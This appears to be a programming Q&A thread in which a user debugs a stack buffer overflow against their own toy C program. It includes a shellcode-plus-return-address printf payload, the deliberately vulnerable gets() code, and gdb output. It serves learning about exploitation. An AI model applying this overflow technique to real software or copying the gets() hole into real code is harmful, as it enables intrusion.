# Hex Format Specifier producing unpredictable results in shellcode

Tags: c, printf, exploit, shellcode, format-specifiers

I'm trying to inject shellcode into a basic program that I made that takes in user input. My problem is that even though i have lined up my shellcode properly so that I am able to rewrite the return address in the stack, the correct address is not being stored in that location. I did a printf of my shellcode, followed by some calculated padding, and then the address of where my shellcode would be located on the stack.

```
      $ printf "\xe8\x09\x00\x00\x00\x41\x43\x43\x45\x50\x54\x45\x44\x6e\x59\xc6\x41 
      \x08\x00\xba\x08\x00\x00\x00\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xc\x80
      \xf4%025x\x5e\xf3\xff\xbf" | ./victim
```

The address that I am trying to overwrite the return address with is 0xbffff35e. Yet, when I run it this in gdb, it segfaults because the "5e" portion is not being correctly encoded into my stack.

I get this in gdb:

```
    Program terminated with signal 11, Segmentation fault.
    #0  0xbffff365 in ?? ()
```

My program should be executing instructions at 0xbffff35e, yet it is being written with a "65" in place of where the "5e" byte is supposed to be. I am using the hex format specifier correctly, so why is this occurring? Every other byte seems to be written correctly except the \x5e hex byte

**EDIT:** 
Here is the code to my victim. All I want to do is inject shellcode so that it prints out "ACCEPTED" instead of reaching the next line where it prints "DENIED"

```
    void getPass() {
      char password[50];
      gets(password);
    }


    int main() {

      printf("Please enter your password: \n");
      getPass();
      printf("PASSWORD DENIED\n");
      return 0;

    }
```

Disassembly of my victim code

```
    (gdb) disas getPass
    Dump of assembler code for function getPass:
      0x080482bc <+0>:  push   %ebp
      0x080482bd <+1>:  mov    %esp,%ebp
      0x080482bf <+3>:  sub    $0x58,%esp
      0x080482c2 <+6>:  lea    -0x3a(%ebp),%eax
      0x080482c5 <+9>:  mov    %eax,(%esp)
      0x080482c8 <+12>: call   0x8049370 <gets>
      0x080482cd <+17>: leave  
      0x080482ce <+18>: ret    

 (gdb) disas main
 Dump of assembler code for function main:
     0x080482cf <+0>:   push   %ebp
     0x080482d0 <+1>:   mov    %esp,%ebp
     0x080482d2 <+3>:   and    $0xfffffff0,%esp
     0x080482d5 <+6>:   sub    $0x10,%esp
     0x080482d8 <+9>:   movl   $0x80b314c,(%esp)
     0x080482df <+16>:  call   0x8049510 <puts>
     0x080482e4 <+21>:  call   0x80482bc <getPass>
     0x080482e9 <+26>:  movl   $0x80b3169,(%esp)
     0x080482f0 <+33>:  call   0x8049510 <puts>
     0x080482f5 <+38>:  mov    $0x0,%eax
     0x080482fa <+43>:  leave  
     0x080482fb <+44>:  ret
```

Comment: Most shellcodes exploit undefined behavior. The problem with doing it is that it will *still* be undefined behavior, and it won't work unless the shellcode is made for a specific version of the "victim" program. Even a rebuild of the victim program may cause the exploit to stop working.

Comment: Are you trying to run this on an SE (Security Enhanced) version of Linux?  If so, you will never succeed.  The stack location is randomized.

Comment: No, I have already disabled ASLR and DEP. I have other similar buffer overflow exploits I've done that worked with the settings I have now. It's just this instance where it seems to not work.

Comment: Oh, okay.  What does `./victim` do?

Comment: @wallyk I have posted ./victim in my edit

Comment: Don't use the obsolete `gets` ; at least `fgets`  or preferably `getline`

Comment: @BasileStarynkevitch the point of this question *is* to use the obsolete `gets`

Answer (score 0):

The output of that printf is

```
[wally@lenovoR61 ~]$ printf "\xe8\x09\x00\x00\x00\x41\x43\x43\x45\x50\x54\x45\x44\x6e\x59\xc6\x41\x08\x00\xba\x08\x00\x00\x00\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xc\x80\xf4%025x\x5e\xf3\xff\xbf" \
> | hexdump -C
00000000  e8 09 00 00 00 41 43 43  45 50 54 45 44 6e 59 c6  |.....ACCEPTEDnY.|
00000010  41 08 00 ba 08 00 00 00  bb 01 00 00 00 b8 04 00  |A...............|
00000020  00 00 0c 80 f4 30 30 30  30 30 30 30 30 30 30 30  |.....00000000000|
00000030  30 30 30 30 30 30 30 30  30 30 30 30 30 30 5e f3  |00000000000000^.|
00000040  ff bf                                             |..|
00000042
```

So, beginning at byte 50, there is this:

```
00000032        30 30 30 30 30 30  30 30 30 30 30 30 5e f3  |  000000000000^.|
00000040  ff bf                                             |..|
00000042
```

So there are a bunch of `30`s where the saved `ebp` and return address should be.  The instructions for getPass() are:

```
getPass:
        pushl   %ebp
        movl    %esp, %ebp
        subl    $88, %esp
        leal    -58(%ebp), %eax
        movl    %eax, (%esp)
        call    gets
        leave
        ret
```

So `leave` changes the "restored" `ebp` to 0x30303030 since that part of the stack was overwritten with it.  The return address is below that, also 0x30303030, at least in 32-bit x86 code.

I would expect this to always segfault, even on SELinux.

---

Addendum:

Well, the desired address seems to work for me.  To set this up so `gdb` can view the stack frame, I wrote the data to a file and altered `victim.c` to read it instead:

```
$ printf "\xe8\x09\x00\x00\x00\x41\x43\x43\x45\x50\x54\x45\x44\x6e\x59\xc6\x41\x08\x00\xba\x08\x00\x00\x00\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xc\x80\xf4%025x\x5e\xf3\xff\xbf" \
> >victim.txt

$ cat victim.c
#include <stdio.h>

void getPass()
{
    char password[50];
    gets(password);
}

int main()
{
    FILE *f = freopen ("victim.txt", "r", stdin);
    printf("Please enter your password: \n");
    getPass();
    printf("PASSWORD DENIED\n");
    return 0;
}
$ gdb victim
 ...
Temporary breakpoint 1, main () at victim.c:12
12      FILE *f = freopen ("victim.txt", "r", stdin);
(gdb) next
13      printf("Please enter your password: \n");
(gdb) 
Please enter your password: 
14      getPass();
(gdb) step
getPass () at victim.c:6
6       gets(password);
(gdb) bt
#0  getPass () at victim.c:7
#1  0xbffff35e in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
(gdb) step
Cannot access memory at address 0x30303034
```

Which shows that it is returning to 0x30303030.  What do you get?

Comment: Thank you for your response. I appreciate it very much. But I'm still confused as to how I got a "65" where there should be a "5e" when I feed my shellcode into my victim. I did printf "...shellcode and padding omitted...\x5e\xf3\xff\xbf" and instead of "0xbffff35e" being stored in the stack, "0xbffff365" is being stored. I'm sure that the return address is not being overwritten with 0x30303030 because when I run the code in gdb, it tries to execute instructions at address 0x0xbffff365 (which is where it segfaults). If I could just change the '65' to a '5e' this would be fixed I believe.

Comment: To clarify what I was saying in the comment above, the return address is being overwritten with 0x0xbffff365, which causes a segmentation fault. The issue isn't if I've aligned my shellcode bytes correctly, but why the wrong byte (65 hex) is being written in place of 5e hex. It is as if the hex format specifier '\x' is causing trouble here.

Comment: additionally I have updated my post to show the disassembly of my ./victim code

Comment: @user3907641:  I have added to my answer.

Comment: In gdb I get this. I'm not so sure how to interpret this since it includes both the 0xbffff365 hex and the 0x30303034 number you got. How does this read to you? Also, thanks a lot. 

`Program terminated with signal 11, Segmentation fault.
#0  0xbffff365 in ?? ()
(gdb) where
#0  0xbffff365 in ?? ()
Cannot access memory at address 0x30303034`